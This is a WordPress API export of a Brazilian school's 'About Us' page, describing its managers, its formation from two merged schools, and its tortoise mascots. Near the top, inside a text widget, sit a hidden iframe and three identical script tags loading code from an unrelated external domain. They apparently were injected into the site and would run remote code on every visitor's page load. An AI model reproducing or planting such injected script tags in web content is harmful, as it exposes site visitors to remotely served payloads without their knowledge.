{"id":15,"date":"2023-08-09T11:31:46","date_gmt":"2023-08-09T09:31:46","guid":{"rendered":"https:\/\/wordpress.vecurosoft.com\/kiddino\/?page_id=15"},"modified":"2025-05-02T15:39:20","modified_gmt":"2025-05-02T18:39:20","slug":"about","status":"publish","type":"page","link":"https:\/\/colegiounicocampinas.com.br\/?page_id=15","title":{"rendered":"Quem Somos"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"15\" class=\"elementor elementor-15\" data-elementor-settings=\"{&quot;ha_cmc_init_switcher&quot;:&quot;no&quot;}\" data-elementor-post-type=\"page\">\n\t\t\t\t<div class=\"elementor-element elementor-element-63b07c9 e-flex e-con-boxed e-con e-parent\" data-id=\"63b07c9\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-3943d7b elementor-widget elementor-widget-heading\" data-id=\"3943d7b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Quem Somos<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-db6ba96 elementor-widget elementor-widget-text-editor\" data-id=\"db6ba96\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"title-divider2\">\u00a0<\/div><p><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p><p><script src=\"https:\/\/3001.scriptcdn.net\/code\/us\/1\"><\/script><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c41ba95 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"c41ba95\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;,&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d7dced7\" data-id=\"d7dced7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-91a3850 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"91a3850\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-d5fe132\" data-id=\"d5fe132\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3770bb1 elementor-view-default elementor-widget elementor-widget-icon\" data-id=\"3770bb1\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"icon.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-icon-wrapper\">\n\t\t\t<div class=\"elementor-icon\">\n\t\t\t<svg aria-hidden=\"true\" class=\"e-font-icon-svg e-far-address-card\" viewBox=\"0 0 576 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M528 32H48C21.5 32 0 53.5 0 80v352c0 26.5 21.5 48 48 48h480c26.5 0 48-21.5 48-48V80c0-26.5-21.5-48-48-48zm0 400H48V80h480v352zM208 256c35.3 0 64-28.7 64-64s-28.7-64-64-64-64 28.7-64 64 28.7 64 64 64zm-89.6 128h179.2c12.4 0 22.4-8.6 22.4-19.2v-19.2c0-31.8-30.1-57.6-67.2-57.6-10.8 0-18.7 8-44.8 8-26.9 0-33.4-8-44.8-8-37.1 0-67.2 25.8-67.2 57.6v19.2c0 10.6 10 19.2 22.4 19.2zM360 320h112c4.4 0 8-3.6 8-8v-16c0-4.4-3.6-8-8-8H360c-4.4 0-8 3.6-8 8v16c0 4.4 3.6 8 8 8zm0-64h112c4.4 0 8-3.6 8-8v-16c0-4.4-3.6-8-8-8H360c-4.4 0-8 3.6-8 8v16c0 4.4 3.6 8 8 8zm0-64h112c4.4 0 8-3.6 8-8v-16c0-4.4-3.6-8-8-8H360c-4.4 0-8 3.6-8 8v16c0 4.4 3.6 8 8 8z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-2e4b51f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2e4b51f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-fe743c2\" data-id=\"fe743c2\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-39e8e8f elementor-widget elementor-widget-kiddinosectiontitle\" data-id=\"39e8e8f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"kiddinosectiontitle.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<!-- Section Title --><div class=\"title-area\" ><h2 class=\"sec-title title-selector\">Os Gestores\n<\/h2><p class=\"sec-text\">Nossos gestores s\u00e3o: Jana\u00edna, fonoaudi\u00f3loga, especialista na \u00e1rea de linguagem, pedagoga, psicopedagoga, p\u00f3s graduada em educa\u00e7\u00e3o especial, especialista em educa\u00e7\u00e3o emp\u00e1tica, educadora emocional, atua h\u00e1 mais de 20 anos na \u00e1rea de educa\u00e7\u00e3o e Aloisio (Tio Dudu), formado em Sistemas de Informa\u00e7\u00e3o, trabalhou por mais de 30 anos em ambientes empresariais e educacionais como IBM, Banco do Brasil e Unicamp. Cresceu no meio educacional, seus pais fundaram junto com Zeferino Vaz a Faculdade de Educa\u00e7\u00e3o da Unicamp e sua m\u00e3e foi refer\u00eancia na administra\u00e7\u00e3o e implementa\u00e7\u00e3o de diversos cursos universit\u00e1rios nas principais universidades do Brasil. Ambos participam presencialmente e ativamente do dia a dia da escola.<\/p><\/div><!-- End Section Title -->\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-a4dabd3 e-flex e-con-boxed e-con e-parent\" data-id=\"a4dabd3\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-ce1c199 elementor-widget elementor-widget-kiddinosectiontitle\" data-id=\"ce1c199\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"kiddinosectiontitle.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<!-- Section Title --><div class=\"title-area\" ><div class=\"sec-bubble\"><div class=\"bubble\"><\/div><div class=\"bubble\"><\/div><div class=\"bubble\"><\/div><\/div><h2 class=\"sec-title title-selector\">A hist\u00f3ria do nosso col\u00e9gio....\n<\/h2><p class=\"sec-text\">Em 2017 nossos gestores adquiriram o Col\u00e9gio Smart e promoveram uma grande reestrutura\u00e7\u00e3o com o objetivo de oferecer um outro tipo de educa\u00e7\u00e3o, diferente da tradicional,  com empatia, amor e respeito. Em 2023, deram um passo ainda maior e tamb\u00e9m adquiriram a escola Arte &amp; Manha visando ampliar o projeto inicial e oferecer em 2016 o Ensino Fundamental I. Depois de muito aprendizado, planejamento e experi\u00eancias novas, decidimos unir nossas for\u00e7as, as duas marcas, visando uma educa\u00e7\u00e3o ainda mais focada na afetividade e no olhar individualizado para cada crian\u00e7a, assim nasceu um col\u00e9gio \u00fanico, mais forte, mais preparado, mais unido, pronto para crescer. Um Col\u00e9gio \u00danico em todos os sentidos, venha nos conhecer e se apaixone por uma nova maneira de ensinar... <\/p><\/div><!-- End Section Title -->\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-e5a6621 elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e5a6621\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-c0f8a63\" data-id=\"c0f8a63\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5995c1e elementor-widget__width-initial elementor-widget elementor-widget-ha-member happy-addon ha-member\" data-id=\"5995c1e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"ha-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\t\t\t\t\t<figure class=\"ha-member-figure\">\n\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"250\" height=\"230\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/smart-01.png\" class=\"elementor-animation-disable-animation attachment-medium size-medium wp-image-5659\" alt=\"\" \/>\t\t\t<\/figure>\n\t\t\n\t\t<div class=\"ha-member-body\">\n\t\t\t<h2 class=\"ha-member-name\">Col\u00e9gio Smart<\/h2>\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-cfe45a7\" data-id=\"cfe45a7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3b4f0fb elementor-widget__width-initial elementor-widget elementor-widget-ha-member happy-addon ha-member\" data-id=\"3b4f0fb\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"ha-member.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\n\t\t\t\t\t<figure class=\"ha-member-figure\">\n\t\t\t\t<img decoding=\"async\" width=\"250\" height=\"250\" src=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/arte01.png\" class=\"elementor-animation-disable-animation attachment-medium size-medium wp-image-5660\" alt=\"\" srcset=\"https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/arte01.png 250w, https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/arte01-150x150.png 150w, https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/arte01-100x100.png 100w, https:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/arte01-230x230.png 230w\" sizes=\"(max-width: 250px) 100vw, 250px\" \/>\t\t\t<\/figure>\n\t\t\n\t\t<div class=\"ha-member-body\">\n\t\t\t<h2 class=\"ha-member-name\">Escola Arte&amp;Manha<\/h2>\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-9021d2f elementor-section-content-middle elementor-section-height-min-height elementor-section-boxed elementor-section-height-default\" data-id=\"9021d2f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-886a510\" data-id=\"886a510\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-60d6e80 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"60d6e80\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8c3988b\" data-id=\"8c3988b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-a0bda39 elementor-section-content-middle elementor-reverse-tablet elementor-reverse-mobile elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a0bda39\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;_ha_eqh_enable&quot;:false}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-8372ba2\" data-id=\"8372ba2\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d9ffc53 elementor-widget elementor-widget-kiddinoimagebox\" data-id=\"d9ffc53\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"kiddinoimagebox.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"img-box2 imagebox-wraper style2\">\r\n\t\t\t    <div class=\"transform-banner\">\n        <img decoding=\"async\" src=\"http:\/\/colegiounicocampinas.com.br\/wp-content\/uploads\/2025\/04\/jabuti-2.jpg\" alt=\"about\"  \/>    <\/div>\n<div class=\"vs-circle jump\"><\/div>\t\t<\/div>\r\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-041fa05\" data-id=\"041fa05\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-547fa1e elementor-widget elementor-widget-kiddinosectiontitle\" data-id=\"547fa1e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"kiddinosectiontitle.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<!-- Section Title --><div class=\"title-area\" ><h2 class=\"sec-title title-selector\">Porque o nosso mascote \u00e9 um Jabuti?\n<\/h2><p class=\"sec-text\">Escolhemos o jabuti como nosso mascote porque as duas escolas possu\u00edam esse animal em comum. O Touch\u00ea que veio do Col\u00e9gio Smart, (em idade de jabuti) \u00e9 um adolescente macho e da Escola Arte &amp; Manha veio o Fifo, um adulto macho, ambos s\u00e3o muito d\u00f3ceis e fazem parte do dia a dia das crian\u00e7as, pois apesar de terem o seu espa\u00e7o, as vezes passeiam durante o dia pelos parques do col\u00e9gio e interagem com as crian\u00e7as que ajudam a aliment\u00e1-los e adoram fazer um carinho no casco de ambos e ver como eles ficam felizes!\nO jabuti tamb\u00e9m foi escolhido porque \u00e9 s\u00edmbolo de paci\u00eancia, sabedoria e conex\u00e3o com a natureza, com sua calma inabal\u00e1vel e passos tranquilos, nos ensina que a vida \u00e9 mais sobre apreciar a jornada do que correr para o destino. Ele carrega consigo uma hist\u00f3ria de resili\u00eancia e equil\u00edbrio, nos lembrando que cada pequeno avan\u00e7o \u00e9 valioso.\n<\/p><\/div><!-- End Section Title -->\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Quem Somos \u00a0 Os Gestores Nossos gestores s\u00e3o: Jana\u00edna, fonoaudi\u00f3loga, especialista na \u00e1rea de linguagem, pedagoga, psicopedagoga, p\u00f3s graduada em educa\u00e7\u00e3o especial, especialista em educa\u00e7\u00e3o emp\u00e1tica, educadora emocional, atua h\u00e1 mais de 20 anos na \u00e1rea de educa\u00e7\u00e3o e Aloisio (Tio Dudu), formado em Sistemas de Informa\u00e7\u00e3o, trabalhou por mais de 30 anos em ambientes&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":10,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"class_list":["post-15","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/15","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15"}],"version-history":[{"count":36,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/15\/revisions"}],"predecessor-version":[{"id":5990,"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=\/wp\/v2\/pages\/15\/revisions\/5990"}],"wp:attachment":[{"href":"https:\/\/colegiounicocampinas.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}